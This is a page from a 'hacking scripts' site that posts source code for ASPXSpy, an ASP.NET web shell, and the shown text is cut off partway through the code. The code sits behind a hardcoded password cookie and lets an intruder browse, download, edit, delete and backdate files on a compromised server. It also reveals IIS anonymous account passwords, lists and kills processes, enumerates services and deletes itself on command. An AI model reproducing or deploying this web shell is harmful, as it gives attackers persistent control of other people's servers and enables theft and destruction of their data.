HackingScripts

Hack Scripts for everybody

C# Shell SQL tool

27 Apr 2015

C# Shell SQL tool Source code

Copyright © 2006-2009 alikaptanoglu

   1 <%@ Page Language="C#" Debug="true" trace="false" validateRequest="false" EnableViewStateMac="false" EnableViewState="true"%>
   2 <%@ import Namespace="System.IO"%>
   3 <%@ import Namespace="System.Diagnostics"%>
   4 <%@ import Namespace="System.Data"%>
   5 <%@ import Namespace="System.Management"%>
   6 <%@ import Namespace="System.Data.OleDb"%>
   7 <%@ import Namespace="Microsoft.Win32"%>
   8 <%@ import Namespace="System.Net.Sockets" %>
   9 <%@ import Namespace="System.Net" %>
  10 <%@ import Namespace="System.Runtime.InteropServices"%>
  11 <%@ import Namespace="System.DirectoryServices"%>
  12 <%@ import Namespace="System.ServiceProcess"%>
  13 <%@ import Namespace="System.Text.RegularExpressions"%>
  14 <%@ Import Namespace="System.Threading"%>
  15 <%@ Import Namespace="System.Data.SqlClient"%>
  16 <%@ import Namespace="Microsoft.VisualBasic"%>
  17 <%@ Assembly Name="System.DirectoryServices,Version=2.0.0.0,Culture=neutral,PublicKeyToken=B03F5F7F11D50A3A"%>
  18 <%@ Assembly Name="System.Management,Version=2.0.0.0,Culture=neutral,PublicKeyToken=B03F5F7F11D50A3A"%>
  19 <%@ Assembly Name="System.ServiceProcess,Version=2.0.0.0,Culture=neutral,PublicKeyToken=B03F5F7F11D50A3A"%>
  20 <%@ Assembly Name="Microsoft.VisualBasic,Version=7.0.3300.0,Culture=neutral,PublicKeyToken=b03f5f7f11d50a3a"%>
  21 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
  22 <script runat="server">
  23 /*
  24 Thanks Snailsor,FuYu,BloodSword,Cnqing,
  25 Code by Bin
  26 Make in China
  27 Blog: http://alikaptanoglu.blogspot.com
  28 E-mail : ali_kaptanoglu@hotmail.com<script cf-hash="f9e31" type="text/javascript">
  29 /* <![CDATA[ */!function(){try{var t="currentScript"in document?document.currentScript:function(){for(var t=document.getElementsByTagName("script"),e=t.length;e--;)if(t[e].getAttribute("cf-hash"))return t[e]}();if(t&&t.previousSibling){var e,r,n,i,c=t.previousSibling,a=c.getAttribute("data-cfemail");if(a){for(e="",r=parseInt(a.substr(0,2),16),n=2;a.length-n;n+=2)i=parseInt(a.substr(n,2),16)^r,e+=String.fromCharCode(i);e=document.createTextNode(e),c.parentNode.replaceChild(e,c)}}}catch(u){}}();/* ]]> */</script>
  30 */
  31 public string Password="21232f297a57a5a743894a0e4a801fc3";//admin
  32 public string vbhLn="ASPXSpy";
  33 public int TdgGU=1;
  34 protected OleDbConnection Dtdr=new OleDbConnection();
  35 protected OleDbCommand Kkvb=new OleDbCommand();
  36 public NetworkStream NS=null;
  37 public NetworkStream NS1=null;
  38 TcpClient tcp=new TcpClient();
  39 TcpClient zvxm=new TcpClient();
  40 ArrayList IVc=new ArrayList();
  41 protected void Page_load(object sender,EventArgs e)
  42 {
  43 YFcNP(this);
  44 fhAEn();
  45 if (!pdo())
  46 {
  47 return;
  48 }
  49 if(IsPostBack)
  50 {
  51 string tkI=Request["__EVENTTARGET"];
  52 string VqV=Request["__File"];
  53 if(tkI!="")
  54 {
  55 switch(tkI)
  56 {
  57 case "Bin_Parent":
  58 krIR(Ebgw(VqV));
  59 break;
  60 case "Bin_Listdir":
  61 krIR(Ebgw(VqV));
  62 break;
  63 case "kRXgt":
  64 kRXgt(Ebgw(VqV));
  65 break;
  66 case "Bin_Createfile":
  67 gLKc(VqV);
  68 break;
  69 case "Bin_Editfile":
  70 gLKc(VqV);
  71 break;
  72 case "Bin_Createdir":
  73 stNPw(VqV);
  74 break;
  75 case "cYAl":
  76 cYAl(VqV);
  77 break;
  78 case "ksGR":
  79 ksGR(Ebgw(VqV));
  80 break;
  81 case "SJv":
  82 SJv(VqV);
  83 break;
  84 case "Bin_Regread":
  85 tpRQ(Ebgw(VqV));
  86 break;
  87 case "hae":
  88 hae();
  89 break;
  90 case "urJG":
  91 urJG(VqV);
  92 break;
  93 }
  94 if(tkI.StartsWith("dAJTD"))
  95 {
  96 dAJTD(Ebgw(tkI.Replace("dAJTD","")),VqV);
  97 }
  98 else if(tkI.StartsWith("Tlvz"))
  99 {
 100 Tlvz(Ebgw(tkI.Replace("Tlvz","")),VqV);
 101 }
 102 else if(tkI.StartsWith("Bin_CFile"))
 103 {
 104 YByN(Ebgw(tkI.Replace("Bin_CFile","")),VqV);
 105 }
 106 }
 107 }
 108 else
 109 {
 110 PBZw();
 111 }
 112 }
 113 public bool pdo()
 114 {
 115 if(Request.Cookies[vbhLn]==null)
 116 {
 117 tZSx();
 118 return false;
 119 }
 120 else
 121 {
 122 if (Request.Cookies[vbhLn].Value != Password)
 123 {
 124 tZSx();
 125 return false;
 126 }
 127 else
 128 {
 129 return true;
 130 }
 131 }
 132 }
 133 public void tZSx()
 134 {
 135 ljtzC.Visible=true;
 136 ZVS.Visible=false;
 137 }
 138 protected void YKpI(object sender,EventArgs e)
 139 {
 140 Session.Abandon();
 141 Response.Cookies.Add(new HttpCookie(vbhLn,null));
 142 tZSx();
 143 }
 144 public void PBZw()
 145 {
 146 ZVS.Visible=true;
 147 ljtzC.Visible=false;
 148 Bin_Button_CreateFile.Attributes["onClick"]="var filename=prompt('Please input the file name:','');if(filename){Bin_PostBack('Bin_Createfile',filename);}";
 149 Bin_Button_CreateDir.Attributes["onClick"]="var filename=prompt('Please input the directory name:','');if(filename){Bin_PostBack('Bin_Createdir',filename);}";
 150 Bin_Button_KillMe.Attributes["onClick"]="if(confirm('Are you sure delete ASPXSPY?')){Bin_PostBack('hae','');};";
 151 Bin_Span_Sname.InnerHtml=Request.ServerVariables["LOCAL_ADDR"]+":"+Request.ServerVariables["SERVER_PORT"]+"("+Request.ServerVariables["SERVER_NAME"]+")";
 152 Bin_Span_FrameVersion.InnerHtml="Framework Ver : "+Environment.Version.ToString();
 153 if (AXSbb.Value==string.Empty)
 154 {
 155 AXSbb.Value=OElM(Server.MapPath("."));
 156 }
 157 Bin_H2_Title.InnerText="File Manager >>";
 158 krIR(AXSbb.Value);
 159 }
 160 public void fhAEn()
 161 {
 162 try
 163 {
 164 string[] YRgt=Directory.GetLogicalDrives();
 165 for(int i=0;i<YRgt.Length;i++)
 166 {
 167 Control c=ParseControl(" <asp:LinkButton Text='"+mFvj(YRgt[i])+"' ID=\"Bin_Button_Driv"+i+"\" runat='server' commandargument= '"+YRgt[i]+"'/> | ");
 168 Bin_Span_Drv.Controls.Add(c);
 169 LinkButton nxeDR=(LinkButton)Page.FindControl("Bin_Button_Driv"+i);
 170 nxeDR.Command+=new CommandEventHandler(this.iVk);
 171 }
 172 }catch(Exception ex){}
 173 }
 174 public string OElM(string path)
 175 {
 176 if(path.Substring(path.Length-1,1)!=@"\")
 177 {
 178 path=path+@"\";
 179 }
 180 return path;
 181 }
 182 public string nrrx(string path)
 183 {
 184 char[] trim={'\\'};
 185 if(path.Substring(path.Length-1,1)==@"\")
 186 {
 187 path=path.TrimEnd(trim);
 188 }
 189 return path;
 190 }
 191 [DllImport("kernel32.dll",EntryPoint="GetDriveTypeA")]
 192 public static extern int OMZP(string nDrive);
 193 public string mFvj(string instr)
 194 {
 195 string EuXD=string.Empty;
 196 int num=OMZP(instr);
 197 switch(num)
 198 {
 199 case 1:
 200 EuXD="Unknow("+instr+")";
 201 break;
 202 case 2:
 203 EuXD="Removable("+instr+")";
 204 break;
 205 case 3:
 206 EuXD="Fixed("+instr+")";
 207 break;
 208 case 4:
 209 EuXD="Network("+instr+")";
 210 break;
 211 case 5:
 212 EuXD="CDRom("+instr+")";
 213 break;
 214 case 6:
 215 EuXD="RAM Disk("+instr+")";
 216 break;
 217 }
 218 return EuXD.Replace(@"\","");
 219 }
 220 public string MVVJ(string instr)
 221 {
 222 byte[] tmp=Encoding.Default.GetBytes(instr);
 223 return Convert.ToBase64String(tmp);
 224 }
 225 public string Ebgw(string instr)
 226 {
 227 byte[] tmp=Convert.FromBase64String(instr);
 228 return Encoding.Default.GetString(tmp);
 229 }
 230 public void krIR(string path)
 231 {
 232 WICxe();
 233 CzfO.Visible=true;
 234 Bin_H2_Title.InnerText="File Manager >>";
 235 AXSbb.Value=OElM(path);
 236 DirectoryInfo GQMM=new DirectoryInfo(path);
 237 if(Directory.GetParent(nrrx(path))!=null)
 238 {
 239 string bg=OKM();
 240 TableRow p=new TableRow();
 241 for(int i=1;i<6;i++)
 242 {
 243 TableCell pc=new TableCell();
 244 if(i==1)
 245 {
 246 pc.Width=Unit.Parse("2%");
 247 pc.Text="0";
 248 p.CssClass=bg;
 249 }
 250 if(i==2)
 251 {
 252 pc.Text="<a href=\"javascript:Bin_PostBack('Bin_Parent','"+MVVJ(Directory.GetParent(nrrx(path)).ToString())+"')\">Parent Directory</a>";
 253 }
 254 p.Cells.Add(pc);
 255 UGzP.Rows.Add(p);
 256 }
 257 }
 258 try
 259 {
 260 int vLlH=0;
 261 foreach(DirectoryInfo Bin_folder in GQMM.GetDirectories())
 262 {
 263 string bg=OKM();
 264 vLlH++;
 265 TableRow tr=new TableRow();
 266 TableCell tc=new TableCell();
 267 tc.Width=Unit.Parse("2%");
 268 tc.Text="0";
 269 tr.Attributes["onmouseover"]="this.className='focus';";
 270 tr.CssClass=bg;
 271 tr.Attributes["onmouseout"]="this.className='"+bg+"';";
 272 tr.Cells.Add(tc);
 273 TableCell HczyN=new TableCell();
 274 HczyN.Text="<a href=\"javascript:Bin_PostBack('Bin_Listdir','"+MVVJ(AXSbb.Value+Bin_folder.Name)+"')\">"+Bin_folder.Name+"</a>";
 275 tr.Cells.Add(HczyN);
 276 TableCell LYZK=new TableCell();
 277 LYZK.Text=Bin_folder.LastWriteTimeUtc.ToString("yyyy-MM-dd hh:mm:ss");
 278 tr.Cells.Add(LYZK);
 279 UGzP.Rows.Add(tr);
 280 TableCell ERUL=new TableCell();
 281 ERUL.Text="--";
 282 tr.Cells.Add(ERUL);
 283 UGzP.Rows.Add(tr);
 284 TableCell ZGKh=new TableCell();
 285 ZGKh.Text="<a href=\"javascript:if(confirm('Are you sure will delete it ?\\n\\nIf non-empty directory,will be delete all the files.')){Bin_PostBack('kRXgt','"+MVVJ(AXSbb.Value+Bin_folder.Name)+"')};\">Del</a> | <a href='#' onclick=\"var filename=prompt('Please input the new folder name:','"+AXSbb.Value.Replace(@"\",@"\\")+Bin_folder.Name.Replace("'","\\'")+"');if(filename){Bin_PostBack('dAJTD"+MVVJ(AXSbb.Value+Bin_folder.Name)+"',filename);} \">Rename</a>";
 286 tr.Cells.Add(ZGKh);
 287 UGzP.Rows.Add(tr);
 288 }
 289 TableRow cKVA=new TableRow();
 290 cKVA.Attributes["style"]="border-top:1px solid #fff;border-bottom:1px solid #ddd;";
 291 cKVA.Attributes["bgcolor"]="#dddddd";
 292 TableCell JlmW=new TableCell();
 293 JlmW.Attributes["colspan"]="6" ;
 294 JlmW.Attributes["height"]="5";
 295 cKVA.Cells.Add(JlmW);
 296 UGzP.Rows.Add(cKVA);
 297 int aYRwo=0;
 298 foreach(FileInfo Bin_Files in GQMM.GetFiles())
 299 {
 300 aYRwo++;
 301 string gb=OKM();
 302 TableRow tr=new TableRow();
 303 TableCell tc=new TableCell();
 304 tc.Width=Unit.Parse("2%");
 305 tc.Text="<input type=\"checkbox\" value=\"0\" name=\""+MVVJ(Bin_Files.Name)+"\">";
 306 tr.Attributes["onmouseover"]="this.className='focus';";
 307 tr.CssClass=gb;
 308 tr.Attributes["onmouseout"]="this.className='"+gb+"';";
 309 tr.Cells.Add(tc);
 310 TableCell filename=new TableCell();
 311 if(Bin_Files.FullName.StartsWith(Request.PhysicalApplicationPath))
 312 {
 313 string url=Request.Url.ToString();
 314 filename.Text="<a href=\""+Bin_Files.FullName.Replace(Request.PhysicalApplicationPath,url.Substring(0,url.IndexOf('/',8)+1)).Replace("\\","/")+"\" target=\"_blank\">"+Bin_Files.Name+"</a>";
 315 }
 316 else
 317 {
 318 filename.Text=Bin_Files.Name;
 319 }
 320 TableCell albt=new TableCell();
 321 albt.Text=Bin_Files.LastWriteTimeUtc.ToString("yyyy-MM-dd hh:mm:ss");
 322 TableCell YzK=new TableCell();
 323 YzK.Text=mTG(Bin_Files.Length);
 324 TableCell GLpi=new TableCell();
 325 GLpi.Text="<a href=\"#\" onclick=\"Bin_PostBack('ksGR','"+MVVJ(AXSbb.Value+Bin_Files.Name)+"')\">Down</a> | <a href='#' onclick=\"var filename=prompt('Please input the new path(full path):','"+AXSbb.Value.Replace(@"\",@"\\")+Bin_Files.Name.Replace("'","\\'")+"');if(filename){Bin_PostBack('Bin_CFile"+MVVJ(AXSbb.Value+Bin_Files.Name)+"',filename);} \">Copy</a> | <a href=\"#\" onclick=\"Bin_PostBack('Bin_Editfile','"+Bin_Files.Name+"')\">Edit</a> | <a href='#' onclick=\"var filename=prompt('Please input the new file name(full path):','"+AXSbb.Value.Replace(@"\",@"\\")+Bin_Files.Name.Replace("'","\\'")+"');if(filename){Bin_PostBack('Tlvz"+MVVJ(AXSbb.Value+Bin_Files.Name)+"',filename);} \">Rename</a> | <a href=\"#\" onclick=\"Bin_PostBack('cYAl','"+Bin_Files.Name+"')\">Time</a> ";
 326 tr.Cells.Add(filename);
 327 tr.Cells.Add(albt);
 328 tr.Cells.Add(YzK);
 329 tr.Cells.Add(GLpi);
 330 UGzP.Rows.Add(tr);
 331 }
 332 string lgb=OKM();
 333 TableRow oWam=new TableRow();
 334 oWam.CssClass=lgb;
 335 for(int i=1;i<4;i++)
 336 {
 337 TableCell lGV=new TableCell();
 338 if(i==1)
 339 {
 340 lGV.Text="<input name=\"chkall\" value=\"on\" type=\"checkbox\" onclick=\"var ck=document.getElementsByTagName('input');for(var i=0;i<ck.length-1;i++){if(ck[i].type=='checkbox'&&ck[i].name!='chkall'){ck[i].checked=forms[0].chkall.checked;}}\"/>";
 341 }
 342 if(i==2)
 343 {
 344 lGV.Text="<a href=\"#\" Onclick=\"var d_file='';var ck=document.getElementsByTagName('input');for(var i=0;i<ck.length-1;i++){if(ck[i].checked&&ck[i].name!='chkall'){d_file+=ck[i].name+',';}};if(d_file==null || d_file==''){ return;} else {if(confirm('Are you sure delete the files ?')){Bin_PostBack('SJv',d_file)};}\">Delete selected</a>";
 345 }
 346 if(i==3)
 347 {
 348 lGV.ColumnSpan=4;
 349 lGV.Style.Add("text-align","right");
 350 lGV.Text=vLlH+" directories/ "+aYRwo+" files";
 351 }
 352 oWam.Cells.Add(lGV);
 353 }
 354 UGzP.Rows.Add(oWam);
 355 }
 356 catch(Exception error)
 357 {
 358 xseuB(error.Message);
 359 }
 360 }
 361 public string OKM()
 362 {
 363 TdgGU++;
 364 if(TdgGU % 2==0)
 365 {
 366 return "alt1";
 367 }
 368 else
 369 {
 370 return "alt2";
 371 }
 372 }
 373 public void kRXgt(string qcKu)
 374 {
 375 try
 376 {
 377 Directory.Delete(qcKu,true);
 378 xseuB("Directory delete new success !");
 379 }
 380 catch(Exception error)
 381 {
 382 xseuB(error.Message);
 383 }
 384 krIR(Directory.GetParent(qcKu).ToString());
 385 }
 386 public void dAJTD(string sdir,string ddir)
 387 {
 388 try
 389 {
 390 Directory.Move(sdir,ddir);
 391 xseuB("Directory Renamed Success !");
 392 }
 393 catch(Exception error)
 394 {
 395 xseuB(error.Message);
 396 }
 397 krIR(AXSbb.Value);
 398 }
 399 public void Tlvz(string sfile,string dfile)
 400 {
 401 try
 402 {
 403 File.Move(sfile,dfile);
 404 xseuB("File Renamed Success !");
 405 }
 406 catch(Exception error)
 407 {
 408 xseuB(error.Message);
 409 }
 410 krIR(AXSbb.Value);
 411 }
 412 public void YByN(string spath,string dpath)
 413 {
 414 try
 415 {
 416 File.Copy(spath,dpath);
 417 xseuB("File Copy Success !");
 418 }
 419 catch(Exception error)
 420 {
 421 xseuB(error.Message);
 422 }
 423 krIR(AXSbb.Value);
 424 }
 425 public void stNPw(string path)
 426 {
 427 try
 428 {
 429 Directory.CreateDirectory(AXSbb.Value+path);
 430 xseuB("Directory created success !");
 431 }
 432 catch(Exception error)
 433 {
 434 xseuB(error.Message);
 435 }
 436 krIR(AXSbb.Value);
 437 }
 438 public void gLKc(string path)
 439 {
 440 if(Request["__EVENTTARGET"]=="Bin_Editfile" || Request["__EVENTTARGET"]=="Bin_Createfile")
 441 {
 442 foreach(ListItem item in NdCX.Items)
 443 {
 444 if(item.Selected=true)
 445 {
 446 item.Selected=false;
 447 }
 448 }
 449 }
 450 Bin_H2_Title.InnerHtml="Create/ Edit File >>";
 451 WICxe();
 452 vrFA.Visible=true;
 453 if(path.IndexOf(":")< 0)
 454 {
 455 Sqon.Value=AXSbb.Value+path;
 456 }
 457 else
 458 {
 459 Sqon.Value=path;
 460 }
 461 if(File.Exists(Sqon.Value))
 462 {
 463 StreamReader sr;
 464 if(NdCX.SelectedItem.Text=="UTF-8")
 465 {
 466 sr=new StreamReader(Sqon.Value,Encoding.UTF8);
 467 }
 468 else
 469 {
 470 sr=new StreamReader(Sqon.Value,Encoding.Default);
 471 }
 472 Xgvv.InnerText=sr.ReadToEnd();
 473 sr.Close();
 474 }
 475 else
 476 {
 477 Xgvv.InnerText=string.Empty;
 478 }
 479 }
 480 public void ksGR(string path)
 481 {
 482 FileInfo fs=new FileInfo(path);
 483 Response.Clear();
 484 Page.Response.ClearHeaders();
 485 Page.Response.Buffer=false;
 486 this.EnableViewState=false;
 487 Response.AddHeader("Content-Disposition","attachment;filename="+HttpUtility.UrlEncode(fs.Name,System.Text.Encoding.UTF8));
 488 Response.AddHeader("Content-Length",fs.Length.ToString());
 489 Page.Response.ContentType="application/unknown";
 490 Response.WriteFile(fs.FullName);
 491 Page.Response.Flush();
 492 Page.Response.Close();
 493 Response.End();
 494 Page.Response.Clear();
 495 }
 496 public void SJv(string path)
 497 {
 498 try
 499 {
 500 string[] spdT=path.Split(',');
 501 for(int i=0;i<spdT.Length-1;i++)
 502 {
 503 File.Delete(AXSbb.Value+Ebgw(spdT[i]));
 504 }
 505 xseuB("File Delete Success !");
 506 }
 507 catch(Exception error)
 508 {
 509 xseuB(error.Message);
 510 }
 511 krIR(AXSbb.Value);
 512 }
 513 public void hae()
 514 {
 515 try
 516 {
 517 File.Delete(Request.PhysicalPath);
 518 Response.Redirect("http://www.rootkit.net.cn");
 519 }
 520 catch(Exception error)
 521 {
 522 xseuB(error.Message);
 523 }
 524 }
 525 public void cYAl(string path)
 526 {
 527 Bin_H2_Title.InnerHtml="Clone file was last modified time >>";
 528 WICxe();
 529 zRyG.Visible=true;
 530 QiFB.Value=AXSbb.Value+path;
 531 lICp.Value=AXSbb.Value;
 532 pWVL.Value=AXSbb.Value+path;
 533 string Att=File.GetAttributes(QiFB.Value).ToString();
 534 if(Att.LastIndexOf("ReadOnly")!=-1)
 535 {
 536 ZhWSK.Checked=true;
 537 }
 538 if(Att.LastIndexOf("System")!=-1)
 539 {
 540 SsR.Checked=true;
 541 }
 542 if(Att.LastIndexOf("Hidden")!=-1)
 543 {
 544 ccB.Checked=true;
 545 }
 546 if(Att.LastIndexOf("Archive")!=-1)
 547 {
 548 fbyZ.Checked=true;
 549 }
 550 yUqx.Value=File.GetCreationTimeUtc(pWVL.Value).ToString();
 551 uYjw.Value=File.GetLastWriteTimeUtc(pWVL.Value).ToString();
 552 aLsn.Value=File.GetLastAccessTimeUtc(pWVL.Value).ToString();
 553 }
 554 public static String mTG(Int64 fileSize)
 555 {
 556 if(fileSize<0)
 557 {
 558 throw new ArgumentOutOfRangeException("fileSize");
 559 }
 560 else if(fileSize >= 1024 * 1024 * 1024)
 561 {
 562 return string.Format("{0:########0.00} G",((Double)fileSize)/(1024 * 1024 * 1024));
 563 }
 564 else if(fileSize >= 1024 * 1024)
 565 {
 566 return string.Format("{0:####0.00} M",((Double)fileSize)/(1024 * 1024));
 567 }
 568 else if(fileSize >= 1024)
 569 {
 570 return string.Format("{0:####0.00} K",((Double)fileSize)/ 1024);
 571 }
 572 else
 573 {
 574 return string.Format("{0} B",fileSize);
 575 }
 576 }
 577 private bool SGde(string sSrc)
 578 {
 579 Regex reg=new Regex(@"^0|[0-9]*[1-9][0-9]*$");
 580 if(reg.IsMatch(sSrc))
 581 {
 582 return true;
 583 }
 584 else
 585 {
 586 return false;
 587 }
 588 }
 589 public void AdCx()
 590 {
 591 string qcKu=string.Empty;
 592 string mWGEm="IIS://localhost/W3SVC";
 593 GlI.Style.Add("word-break","break-all");
 594 try
 595 {
 596 DirectoryEntry HHzcY=new DirectoryEntry(mWGEm);
 597 int fmW=0;
 598 foreach(DirectoryEntry child in HHzcY.Children)
 599 {
 600 if(SGde(child.Name.ToString()))
 601 {
 602 fmW++;
 603 DirectoryEntry newdir=new DirectoryEntry(mWGEm+"/"+child.Name.ToString());
 604 DirectoryEntry HlyU=newdir.Children.Find("root","IIsWebVirtualDir");
 605 string bg=OKM();
 606 TableRow TR=new TableRow();
 607 TR.Attributes["onmouseover"]="this.className='focus';";
 608 TR.CssClass=bg;
 609 TR.Attributes["onmouseout"]="this.className='"+bg+"';";
 610 TR.Attributes["title"]="Site:"+child.Properties["ServerComment"].Value.ToString();
 611 for(int i=1;i<6;i++)
 612 {
 613 try
 614 {
 615 TableCell tfit=new TableCell();
 616 switch(i)
 617 {case 1:
 618 tfit.Text=fmW.ToString();
 619 break;
 620 case 2:
 621 tfit.Text=HlyU.Properties["AnonymousUserName"].Value.ToString();
 622 break;
 623 case 3:
 624 tfit.Text=HlyU.Properties["AnonymousUserPass"].Value.ToString();
 625 break;
 626 case 4:
 627 StringBuilder sb=new StringBuilder();
 628 PropertyValueCollection pc=child.Properties["ServerBindings"];
 629 for (int j=0; j < pc.Count; j++)
 630 {
 631 sb.Append(pc[j].ToString()+"<br>");
 632 }
 633 tfit.Text=sb.ToString().Substring(0,sb.ToString().Length-4);
 634 break;
 635 case 5:
 636 tfit.Text="<a href=\"javascript:Bin_PostBack('Bin_Listdir','"+MVVJ(HlyU.Properties["Path"].Value.ToString())+"')\">"+HlyU.Properties["Path"].Value.ToString()+"</a>";
 637 break;
 638 }
 639 TR.Cells.Add(tfit);
 640 }
 641 catch (Exception ex)
 642 {
 643 xseuB(ex.Message);
 644 continue;
 645 }
 646 }
 647 GlI.Controls.Add(TR);
 648 }
 649 }
 650 }
 651 catch(Exception ex)
 652 {
 653 xseuB(ex.Message);
 654 }
 655 }
 656 public ManagementObjectCollection PhQTd(string query)
 657 {
 658 ManagementObjectSearcher QS=new ManagementObjectSearcher(new SelectQuery(query));
 659 return QS.Get();
 660 }
 661 public DataTable cCf(string query)
 662 {
 663 DataTable dt=new DataTable();
 664 int i=0;
 665 ManagementObjectSearcher QS=new ManagementObjectSearcher(new SelectQuery(query));
 666 try
 667 {
 668 foreach(ManagementObject m in QS.Get())
 669 {
 670 DataRow dr=dt.NewRow();
 671 PropertyDataCollection.PropertyDataEnumerator oEnum;
 672 oEnum=(m.Properties.GetEnumerator()as PropertyDataCollection.PropertyDataEnumerator);
 673 while(oEnum.MoveNext())
 674 {
 675 PropertyData DRU=(PropertyData)oEnum.Current;
 676 if(dt.Columns.IndexOf(DRU.Name)==-1)
 677 {
 678 dt.Columns.Add(DRU.Name);
 679 dt.Columns[dt.Columns.Count-1].DefaultValue="";
 680 }
 681 if(m[DRU.Name]!=null)
 682 {
 683 dr[DRU.Name]=m[DRU.Name].ToString();
 684 }
 685 else
 686 {
 687 dr[DRU.Name]=string.Empty;
 688 }
 689 }
 690 dt.Rows.Add(dr);
 691 }
 692 }
 693 catch(Exception error)
 694 {
 695 }
 696 return dt;
 697 }
 698 public void YUw()
 699 {
 700 try
 701 {
 702 Bin_H2_Title.InnerText="Process >>";
 703 WICxe();
 704 DCbS.Visible=true;
 705 int UEbTI=0;
 706 Process[] p=Process.GetProcesses();
 707 foreach(Process sp in p)
 708 {
 709 UEbTI++;
 710 string bg=OKM();
 711 TableRow tr=new TableRow();
 712 tr.Attributes["onmouseover"]="this.className='focus';";
 713 tr.CssClass=bg;
 714 tr.Attributes["onmouseout"]="this.className='"+bg+"';";
 715 for(int i=1;i<7;i++)
 716 {
 717 TableCell td=new TableCell();
 718 if(i==1)
 719 {
 720 td.Width=Unit.Parse("2%");
 721 td.Text=UEbTI.ToString();
 722 tr.Controls.Add(td);
 723 }
 724 if(i==2)
 725 {
 726 td.Text=sp.Id.ToString();
 727 tr.Controls.Add(td);
 728 }
 729 if(i==3)
 730 {
 731 td.Text=sp.ProcessName.ToString();
 732 tr.Controls.Add(td);
 733 }
 734 if(i==4)
 735 {
 736 td.Text=sp.Threads.Count.ToString();
 737 tr.Controls.Add(td);
 738 }
 739 if(i==5)
 740 {
 741 td.Text=sp.BasePriority.ToString();
 742 tr.Controls.Add(td);
 743 }
 744 if(i==6)
 745 {
 746 td.Text="--";
 747 tr.Controls.Add(td);
 748 }
 749 }
 750 IjsL.Controls.Add(tr);
 751 }
 752 }
 753 catch(Exception error)
 754 {
 755 AIz();
 756 }
 757 AIz();
 758 }
 759 public void AIz()
 760 {
 761 try
 762 {
 763 Bin_H2_Title.InnerText="Process >>";
 764 WICxe();
 765 DCbS.Visible=true;
 766 int UEbTI=0;
 767 DataTable dt=cCf("Win32_Process");
 768 for(int j=0;j<dt.Rows.Count;j++)
 769 {
 770 UEbTI++;
 771 string bg=OKM();
 772 TableRow tr=new TableRow();
 773 tr.Attributes["onmouseover"]="this.className='focus';";
 774 tr.CssClass=bg;
 775 tr.Attributes["onmouseout"]="this.className='"+bg+"';";
 776 for(int i=1;i<7;i++)
 777 {
 778 TableCell td=new TableCell();
 779 if(i==1)
 780 {
 781 td.Width=Unit.Parse("2%");
 782 td.Text=UEbTI.ToString();
 783 tr.Controls.Add(td);
 784 }
 785 if(i==2)
 786 {
 787 td.Text=dt.Rows[j]["ProcessID"].ToString();
 788 tr.Controls.Add(td);
 789 }
 790 if(i==3)
 791 {
 792 td.Text=dt.Rows[j]["Name"].ToString();
 793 tr.Controls.Add(td);
 794 }
 795 if(i==4)
 796 {
 797 td.Text=dt.Rows[j]["ThreadCount"].ToString();
 798 tr.Controls.Add(td);
 799 }
 800 if(i==5)
 801 {
 802 td.Text=dt.Rows[j]["Priority"].ToString();
 803 tr.Controls.Add(td);
 804 }
 805 if(i==6)
 806 {
 807 if( dt.Rows[j]["CommandLine"]!=string.Empty)
 808 {
 809 td.Text="<a href=\"javascript:Bin_PostBack('urJG','"+dt.Rows[j]["ProcessID"].ToString()+"')\">Kill</a>";
 810 }
 811 else
 812 {
 813 td.Text="--";
 814 }
 815 tr.Controls.Add(td);
 816 }
 817 }
 818 IjsL.Controls.Add(tr);
 819 }
 820 }
 821 catch(Exception error)
 822 {
 823 xseuB(error.Message);
 824 }
 825 }
 826 public void urJG(string pid)
 827 {
 828 try
 829 {
 830 foreach(ManagementObject p in PhQTd("Select * from Win32_Process Where ProcessID ='"+pid+"'"))
 831 {
 832 p.InvokeMethod("Terminate",null);
 833 p.Dispose();
 834 }
 835 xseuB("Process Kill Success !");
 836 }
 837 catch(Exception error)
 838 {
 839 xseuB(error.Message);
 840 }
 841 AIz();
 842 }
 843 public void oHpF()
 844 {
 845 try
 846 {
 847 Bin_H2_Title.InnerText="Services >>";
 848 WICxe();
 849 iQxm.Visible=true;
 850 int UEbTI=0;
 851 ServiceController[] kQmRu=System.ServiceProcess.ServiceController.GetServices();
 852 for(int i=0;i<kQmRu.Length;i++)
 853 {
 854 UEbTI++;
 855 string bg=OKM();
 856 TableRow tr=new TableRow();
 857 tr.Attributes["onmouseover"]="this.className='focus';";
 858 tr.CssClass=bg;
 859 tr.Attributes["onmouseout"]="this.className='"+bg+"';";
 860 for(int b=1;b<7;b++)
 861 {
 862 TableCell td=new TableCell();
 863 if(b==1)
 864 {
 865 td.Width=Unit.Parse("2%");
 866 td.Text=UEbTI.ToString();
 867 tr.Controls.Add(td);
 868 }
 869 if(b==2)
 870 {
 871 td.Text="null";
 872 tr.Controls.Add(td);
 873 }
 874 if(b==3)
 875 {
 876 td.Text=kQmRu[i].ServiceName.ToString();
 877 tr.Controls.Add(td);
 878 }
 879 if(b==4)
 880 {
 881 td.Text="";
 882 tr.Controls.Add(td);
 883 }
 884 if(b==5)
 885 {
 886 string kOIo=kQmRu[i].Status.ToString();
 887 if(kOIo=="Running")
 888 {
 889 td.Text="<font color=green>"+kOIo+"</font>";
 890 }
 891 else
 892 {
 893 td.Text="<font color=red>"+kOIo+"</font>";
 894 }
 895 tr.Controls.Add(td);
 896 }
 897 if(b==6)
 898 {
 899 td.Text="";
 900 tr.Controls.Add(td);
 901 }
 902 }
 903 vHCs.Controls.Add(tr);
 904 }
 905 }
 906 catch(Exception error)
 907 {
 908 xseuB(error.Message);
 909 }
 910 }
 911 public void tZRH()
 912 {
 913 try
 914 {
 915 Bin_H2_Title.InnerText="Services >>";
 916 WICxe();
 917 iQxm.Visible=true;
 918 int UEbTI=0;
 919 DataTable dt=cCf("Win32_Service");
 920 for(int j=0;j<dt.Rows.Count;j++)
 921 {
 922 UEbTI++;
 923 string bg=OKM();
 924 TableRow tr=new TableRow();
 925 tr.Attributes["onmouseover"]="this.className='focus';";
 926 tr.CssClass=bg;
 927 tr.Attributes["onmouseout"]="this.className='"+bg+"';";
 928 tr.Attributes["title"]=dt.Rows[j]["Description"].ToString();
 929 for(int i=1;i<7;i++)
 930 {
 931 TableCell td=new TableCell();
 932 if(i==1)
 933 {
 934 td.Width=Unit.Parse("2%");
 935 td.Text=UEbTI.ToString();
 936 tr.Controls.Add(td);
 937 }
 938 if(i==2)
 939 {
 940 td.Text=dt.Rows[j]["ProcessID"].ToString();
 941 tr.Controls.Add(td);
